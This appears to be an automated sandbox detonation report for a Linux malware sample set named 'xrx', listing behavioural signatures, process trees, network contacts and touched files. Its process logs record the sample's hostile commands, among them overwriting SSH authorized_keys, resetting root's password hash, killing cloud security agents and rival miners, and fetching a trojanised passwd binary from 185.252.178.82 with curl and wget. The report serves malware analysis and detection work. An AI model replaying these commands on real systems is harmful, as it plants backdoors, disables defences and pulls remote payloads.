Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/790/maps /usr/sbin/needrestart N/A
File opened for reading /proc/792/maps /usr/sbin/needrestart N/A
File opened for reading /proc/593/maps /usr/sbin/needrestart N/A
File opened for reading /proc/756/maps /usr/sbin/needrestart N/A
File opened for reading /proc/763/maps /usr/sbin/needrestart N/A
File opened for reading /proc/778/maps /usr/sbin/needrestart N/A
File opened for reading /proc/339/maps /usr/sbin/needrestart N/A
File opened for reading /proc/586/maps /usr/sbin/needrestart N/A
File opened for reading /proc/785/maps /usr/sbin/needrestart N/A
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/788/maps /usr/sbin/needrestart N/A
File opened for reading /proc/811/maps /usr/sbin/needrestart N/A
File opened for reading /proc/815/maps /usr/sbin/needrestart N/A
File opened for reading /proc/757/maps /usr/sbin/needrestart N/A
File opened for reading /proc/772/maps /usr/sbin/needrestart N/A
File opened for reading /proc/810/maps /usr/sbin/needrestart N/A
File opened for reading /proc/863/maps /usr/sbin/needrestart N/A
File opened for reading /proc/390/maps /usr/sbin/needrestart N/A
File opened for reading /proc/420/maps /usr/sbin/needrestart N/A
File opened for reading /proc/442/maps /usr/sbin/needrestart N/A
File opened for reading /proc/591/maps /usr/sbin/needrestart N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/27/environ /usr/sbin/needrestart N/A
File opened for reading /proc/30/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1084/status /usr/bin/pkill N/A
File opened for reading /proc/36/cgroup /usr/bin/pkill N/A
File opened for reading /proc/420/status /usr/bin/pkill N/A
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/390/status /usr/sbin/needrestart N/A
File opened for reading /proc/2496/stat /usr/sbin/needrestart N/A
File opened for reading /proc/192/ctty /usr/bin/pkill N/A
File opened for reading /proc/1960/stat /usr/bin/pkill N/A
File opened for reading /proc/123/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1977/cgroup /usr/bin/pkill N/A
File opened for reading /proc/201/status /usr/bin/pkill N/A
File opened for reading /proc/792/stat /usr/bin/pkill N/A
File opened for reading /proc/25/stat /usr/bin/pkill N/A
File opened for reading /proc/2576/cgroup /usr/bin/pkill N/A
File opened for reading /proc/258/status /usr/bin/pkill N/A
File opened for reading /proc/420/ctty /usr/bin/pkill N/A
File opened for reading /proc/1916/ctty /usr/bin/pkill N/A
File opened for reading /proc/29/status /usr/bin/pkill N/A
File opened for reading /proc/31/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2005/stat /usr/bin/pkill N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/1084/ctty /usr/bin/pkill N/A
File opened for reading /proc/1122/stat /usr/bin/pkill N/A
File opened for reading /proc/1694/cmdline /usr/bin/pkill N/A
File opened for reading /proc/785/stat /usr/bin/pkill N/A
File opened for reading /proc/790/status /usr/bin/pkill N/A
File opened for reading /proc/191/status /usr/bin/pkill N/A
File opened for reading /proc/387/ctty /usr/bin/pkill N/A
File opened for reading /proc/56/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1794/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2162/cgroup /usr/bin/pkill N/A
File opened for reading /proc/202/ctty /usr/bin/pkill N/A
File opened for reading /proc/6/cgroup /usr/bin/pkill N/A
File opened for reading /proc/15/ctty /usr/bin/pkill N/A
File opened for reading /proc/756/status /usr/bin/pkill N/A
File opened for reading /proc/19/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2193/status /usr/bin/pkill N/A
File opened for reading /proc/2551/stat /usr/sbin/needrestart N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/40/ctty /usr/bin/pkill N/A
File opened for reading /proc/390/status /usr/bin/pkill N/A
File opened for reading /proc/757/stat /usr/bin/pkill N/A
File opened for reading /proc/1712/status /usr/bin/pkill N/A
File opened for reading /proc/1122/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1813/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1095/cmdline /usr/bin/pkill N/A
File opened for reading /proc/29/cmdline /usr/bin/pkill N/A
File opened for reading /proc/52/ctty /usr/bin/pkill N/A
File opened for reading /proc/2204/status /usr/bin/pkill N/A
File opened for reading /proc/511/status /usr/bin/pkill N/A
File opened for reading /proc/1926/status /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/47/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1950/status /usr/sbin/needrestart N/A
File opened for reading /proc/1058/root/usr/lib/python3.12/_threading_local.py /usr/sbin/needrestart N/A
File opened for reading /proc/2497/ctty /usr/bin/pkill N/A
File opened for reading /proc/28/ctty /usr/bin/pkill N/A
File opened for reading /proc/193/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1065/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2496/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2497/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1964/stat /usr/sbin/needrestart N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/dpkg-split N/A
N/A N/A /usr/bin/dpkg N/A
N/A N/A /usr/bin/apt-get N/A

Processes

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c exec '/tmp/xrx/init0' "$@" /tmp/xrx/init0]

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/xrx/init0]

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 40 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 40 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c -- test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke -m u]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart -m u]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.12

[/usr/bin/python3.12 -]

/bin/sh

[sh -c -- if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.x1Rc6IS7G0 /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.x1Rc6IS7G0]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/tr

[tr \n ]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/xrx/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.archive.ubuntu.com udp
US 8.8.8.8:53 archive.ubuntu.com udp
US 8.8.8.8:53 archive.ubuntu.com udp
GB 185.125.190.83:80 archive.ubuntu.com tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

/var/cache/apt/archives/partial/msr-tools_1.3-5build1_amd64.deb

/var/log/apt/eipp.log.xz

/var/lib/dpkg/updates/tmp.i

/var/lib/dpkg/tmp.ci/control

/var/lib/dpkg/tmp.ci/md5sums

/var/lib/dpkg/updates/tmp.i

/var/lib/dpkg/updates/tmp.i

/var/lib/dpkg/updates/tmp.i

/var/lib/dpkg/updates/tmp.i

/var/lib/dpkg/status-new

/var/cache/man/2538

/var/lib/dpkg/status-new

/var/lib/update-notifier/tmp.x1Rc6IS7G0

/etc/passwd+

/etc/shadow+

/etc/shadow+

Analysis: behavioral21

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\key

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\key

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsel-20240729-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-armhf-20240418-en

Max time kernel

1s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/142/cmdline /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/636/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/152/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/267/stat /usr/bin/killall N/A
File opened for reading /proc/290/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/267/stat /usr/bin/killall N/A
File opened for reading /proc/590/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/636/cmdline /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/661/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/318/stat /usr/bin/killall N/A
File opened for reading /proc/318/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/43/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/671/stat /usr/bin/killall N/A
File opened for reading /proc/641/cmdline /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/658/stat /usr/bin/killall N/A
File opened for reading /proc/113/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/103/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/152/stat /usr/bin/killall N/A
File opened for reading /proc/635/cmdline /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/663/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/597/stat /usr/bin/killall N/A
File opened for reading /proc/641/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/317/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/142/stat /usr/bin/killall N/A
File opened for reading /proc/42/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

132s

Max time network

145s

Command Line

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/bash N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/54/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/193/status /usr/bin/pgrep N/A
File opened for reading /proc/736/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/897/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2154/status /usr/bin/pgrep N/A
File opened for reading /proc/16/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/21/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/191/stat /usr/bin/pgrep N/A
File opened for reading /proc/275/status /usr/bin/pgrep N/A
File opened for reading /proc/1123/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1958/ctty /usr/bin/pgrep N/A
File opened for reading /proc/17/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/35/status /usr/bin/pgrep N/A
File opened for reading /proc/2191/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/36/ctty /usr/bin/pgrep N/A
File opened for reading /proc/41/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/65/ctty /usr/bin/pgrep N/A
File opened for reading /proc/43/stat /usr/bin/pgrep N/A
File opened for reading /proc/6/status /usr/bin/pgrep N/A
File opened for reading /proc/11/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/27/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/40/status /usr/bin/pgrep N/A
File opened for reading /proc/2048/status /usr/bin/pgrep N/A
File opened for reading /proc/1902/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1915/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2093/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1644/status /usr/bin/pgrep N/A
File opened for reading /proc/1662/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1857/status /usr/bin/pgrep N/A
File opened for reading /proc/1870/status /usr/bin/pgrep N/A
File opened for reading /proc/15/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/44/status /usr/bin/pgrep N/A
File opened for reading /proc/761/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1046/status /usr/bin/pgrep N/A
File opened for reading /proc/2441/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2048/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2290/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2442/ctty /usr/bin/pgrep N/A
File opened for reading /proc/15/status /usr/bin/pgrep N/A
File opened for reading /proc/34/ctty /usr/bin/pgrep N/A
File opened for reading /proc/193/stat /usr/bin/pgrep N/A
